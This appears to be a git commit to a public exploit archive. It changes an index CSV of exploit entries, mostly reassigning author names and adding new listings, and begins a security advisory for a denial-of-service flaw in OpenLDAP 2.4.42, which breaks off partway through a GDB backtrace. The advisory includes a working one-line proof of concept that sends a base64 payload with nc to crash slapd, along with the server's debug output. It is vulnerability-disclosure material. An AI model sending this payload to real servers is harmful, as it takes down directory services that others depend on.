DB: 2015-09-12
6 new exploits
This commit is contained in:
parent
42b241205e
commit
1ba31aab30
7 changed files with 563 additions and 20 deletions
46
files.csv
46
files.csv
|
@ -33262,7 +33262,7 @@ id,file,description,date,author,platform,type,port
|
|||
36858,platforms/lin_x86-64/shellcode/36858.c,"Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
|
||||
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF <= 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
|
||||
36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
|
||||
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,"John Page",windows,webapps,5466
|
||||
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
|
||||
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
|
||||
36863,platforms/php/webapps/36863.txt,"Joomla Machine Component Multiple SQL Injection Vulnerabilities",2012-02-20,the_cyber_nuxbie,php,webapps,0
|
||||
36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0
|
||||
|
@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
|
|||
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
|
||||
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
|
||||
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,hyp3rlinx,php,webapps,0
|
||||
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
|
||||
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
|
||||
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
|
||||
|
@ -33384,8 +33384,8 @@ id,file,description,date,author,platform,type,port
|
|||
36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injection Vulnerabilities",2015-05-11,"Filippo Roncari",php,webapps,0
|
||||
36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Path Traversal Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
|
||||
36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
|
||||
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,"John Page",php,webapps,0
|
||||
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,"John Page",php,webapps,0
|
||||
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0
|
||||
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,hyp3rlinx,php,webapps,0
|
||||
36996,platforms/unix/remote/36996.rb,"SixApart MovableType Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80
|
||||
36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 'index.php' Cross Site Scripting Vulnerability",2012-03-21,"Stefan Schurtz",php,webapps,0
|
||||
36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
|
||||
|
@ -33461,7 +33461,7 @@ id,file,description,date,author,platform,type,port
|
|||
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
|
||||
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
|
||||
37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
|
||||
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,"John Page",jsp,webapps,80
|
||||
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80
|
||||
37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -33658,9 +33658,9 @@ id,file,description,date,author,platform,type,port
|
|||
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,rebel,linux,local,0
|
||||
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
|
||||
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80
|
||||
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
|
||||
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
|
||||
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080
|
||||
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||
37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
|
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
|
|||
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
|
||||
37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
|
||||
37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
|
||||
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
|
||||
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,hyp3rlinx,php,webapps,80
|
||||
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
|
||||
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
|
||||
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
|
||||
|
@ -33796,7 +33796,7 @@ id,file,description,date,author,platform,type,port
|
|||
37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery 'index.php' Script SQL Injection Vulnerability",2012-06-20,"Taurus Omar",php,webapps,0
|
||||
37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross Site Scripting Vulnerability",2012-06-21,"Sooraj K.S",php,webapps,0
|
||||
37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,"John Page",php,webapps,80
|
||||
37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80
|
||||
37441,platforms/jsp/webapps/37441.txt,"WedgeOS <= 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0
|
||||
37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434
|
||||
37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection Vulnerability",2012-06-21,CoBRa_21,php,webapps,0
|
||||
|
@ -33867,7 +33867,7 @@ id,file,description,date,author,platform,type,port
|
|||
37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80
|
||||
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,"John Page",php,webapps,80
|
||||
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
|
||||
37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
|
||||
37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
|
||||
37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
|
||||
|
@ -33877,7 +33877,7 @@ id,file,description,date,author,platform,type,port
|
|||
37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload Vulnerability",2012-07-21,Am!r,php,webapps,0
|
||||
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
|
||||
37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
|
||||
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
|
||||
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,hyp3rlinx,windows,dos,0
|
||||
37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
|
||||
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
|
||||
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
|
||||
|
@ -33930,7 +33930,7 @@ id,file,description,date,author,platform,type,port
|
|||
37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
|
||||
37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass Vulnerability",2012-08-07,i-Hmx,php,webapps,0
|
||||
37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include Vulnerability",2012-08-07,PuN!Sh3r,php,webapps,0
|
||||
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,"John Page",php,webapps,80
|
||||
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80
|
||||
37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0
|
||||
37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 'unconfirmed' Parameter Cross-Site Scripting Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
|
||||
37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection Vulnerability",2012-08-08,G-B,php,webapps,0
|
||||
|
@ -34020,7 +34020,7 @@ id,file,description,date,author,platform,type,port
|
|||
37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
|
||||
37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
|
||||
37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0
|
||||
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
|
||||
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
|
||||
37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
|
||||
37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
|
||||
37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
|
||||
|
@ -34033,7 +34033,7 @@ id,file,description,date,author,platform,type,port
|
|||
37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
|
||||
37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting Vulnerability",2012-09-05,"High-Tech Bridge",php,webapps,0
|
||||
37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
|
||||
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
|
||||
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
|
||||
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
|
||||
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
|
||||
37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
|
||||
|
@ -34043,10 +34043,10 @@ id,file,description,date,author,platform,type,port
|
|||
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
|
||||
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
|
||||
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
|
||||
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
|
||||
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,hyp3rlinx,php,webapps,0
|
||||
37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
|
||||
37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0
|
||||
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
|
||||
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,hyp3rlinx,php,webapps,80
|
||||
37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80
|
||||
37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
|
||||
37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
|
||||
|
@ -34153,9 +34153,9 @@ id,file,description,date,author,platform,type,port
|
|||
37812,platforms/win32/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,metasploit,win32,remote,8443
|
||||
37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,metasploit,windows,local,0
|
||||
37814,platforms/python/remote/37814.rb,"Werkzeug Debug Shell Command Execution",2015-08-18,metasploit,python,remote,0
|
||||
37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,"John Page",php,webapps,80
|
||||
37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,"John Page",php,webapps,80
|
||||
37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,"John Page",php,webapps,80
|
||||
37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,hyp3rlinx,php,webapps,80
|
||||
37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,hyp3rlinx,php,webapps,80
|
||||
37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80
|
||||
37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
|
||||
37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
|
||||
37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80
|
||||
|
@ -34382,6 +34382,7 @@ id,file,description,date,author,platform,type,port
|
|||
38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
|
||||
38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
|
||||
38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
|
||||
38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack Vulnerability",2015-09-02,"Pier-Luc Maltais",php,webapps,80
|
||||
38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal Vulnerability",2015-09-02,HaHwul,php,webapps,80
|
||||
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
|
||||
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
|
||||
|
@ -34410,7 +34411,7 @@ id,file,description,date,author,platform,type,port
|
|||
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
|
||||
38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
|
||||
38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
|
||||
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081
|
||||
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081
|
||||
38105,platforms/php/webapps/38105.txt,"Wordpress White-Label Framework 2.0.6 - XSS Vulnerability",2015-09-08,Outlasted,php,webapps,80
|
||||
38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
|
||||
38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
|
||||
|
@ -34429,6 +34430,7 @@ id,file,description,date,author,platform,type,port
|
|||
38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
|
||||
38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
|
||||
38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
|
||||
38126,platforms/osx/shellcode/38126.c,"OS X x64 - tcp bind shellcode_ NULL byte free (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
|
||||
38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
|
||||
38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
|
||||
38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
|
||||
|
@ -34445,3 +34447,7 @@ id,file,description,date,author,platform,type,port
|
|||
38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0
|
||||
38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross Site Scripting Vulnerability",2012-12-24,"Rafay Baloch",php,webapps,0
|
||||
38144,platforms/php/webapps/38144.txt,"City Reviewer 'search.php' Script SQL Injection Vulnerability",2012-12-22,3spi0n,php,webapps,0
|
||||
38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389
|
||||
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
|
||||
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
|
||||
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
|
||||
|
|
|
129
platforms/linux/dos/38145.txt
Executable file
129
platforms/linux/dos/38145.txt
Executable file
|
@ -0,0 +1,129 @@
|
|||
# Exploit Title: OpenLDAP 2.4.42 ber_get_next DOS
|
||||
# Date: 11/09/15
|
||||
# Exploit Author: Denis Andzakovic - Security-Assessment.com
|
||||
# Vendor Homepage: http://www.openldap.org/
|
||||
# Software Link:
|
||||
ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/openldap-2.4.42.tgz
|
||||
# Version: <= 2.4.42
|
||||
# Tested on: Debian 8
|
||||
|
||||
( , ) (,
|
||||
. '.' ) ('. ',
|
||||
). , ('. ( ) (
|
||||
(_,) .'), ) _ _,
|
||||
/ _____/ / _ \ ____ ____ _____
|
||||
\____ \==/ /_\ \ _/ ___\/ _ \ / \
|
||||
/ \/ | \\ \__( <_> ) Y Y \
|
||||
/______ /\___|__ / \___ >____/|__|_| /
|
||||
\/ \/.-. \/ \/:wq
|
||||
(x.0)
|
||||
'=.|w|.='
|
||||
_=''"''=.
|
||||
|
||||
presents..
|
||||
OpenLDAP get_ber_next Denial of Service
|
||||
Affected Versions: OpenLDAP <= 2.4.42
|
||||
|
||||
PDF: http://www.security-assessment.com/files/documents/advisory/OpenLDAP-ber_get_next-Denial-of-Service.pdf
|
||||
|
||||
+-------------+
|
||||
| Description |
|
||||
+-------------+
|
||||
By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert() statement, crashing
|
||||
the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian
|
||||
package repository.
|
||||
|
||||
+--------------+
|
||||
| Exploitation |
|
||||
+--------------+
|
||||
By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an
|
||||
assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data.
|
||||
|
||||
The following proof of concept exploit can be used to trigger the condition:
|
||||
|
||||
--[ Exploit POC
|
||||
echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389
|
||||
|
||||
The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash
|
||||
the server even when running in daemon mode.
|
||||
|
||||
--[ sladp -d3
|
||||
55f0b36e slap_listener_activate(7):
|
||||
55f0b36e >>> slap_listener(ldap:///)
|
||||
55f0b36e connection_get(15): got connid=1000
|
||||
55f0b36e connection_read(15): checking for input on id=1000
|
||||
ber_get_next
|
||||
ldap_read: want=8, got=8
|
||||
0000: ff 84 84 84 84 84 77 83 ......w.
|
||||
55f0b36e connection_get(15): got connid=1000
|
||||
55f0b36e connection_read(15): checking for input on id=1000
|
||||
ber_get_next
|
||||
ldap_read: want=1, got=1
|
||||
0000: 0a .
|
||||
55f0b36e connection_get(15): got connid=1000
|
||||
55f0b36e connection_read(15): checking for input on id=1000
|
||||
ber_get_next
|
||||
slapd: io.c:682: ber_get_next: Assertion `0' failed.
|
||||
|
||||
The following GDB back trace provides further information as to the location of the issue.
|
||||
|
||||
--[ back trace
|
||||
program received signal SIGABRT, Aborted.
|
||||
[Switching to Thread 0x7ffff2e4a700 (LWP 1371)]
|
||||
0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
|
||||
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
|
||||
(gdb) bt
|
||||
#0 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
|
||||
#1 0x00007ffff6a144e8 in __GI_abort () at abort.c:89
|
||||
#2 0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c",
|
||||
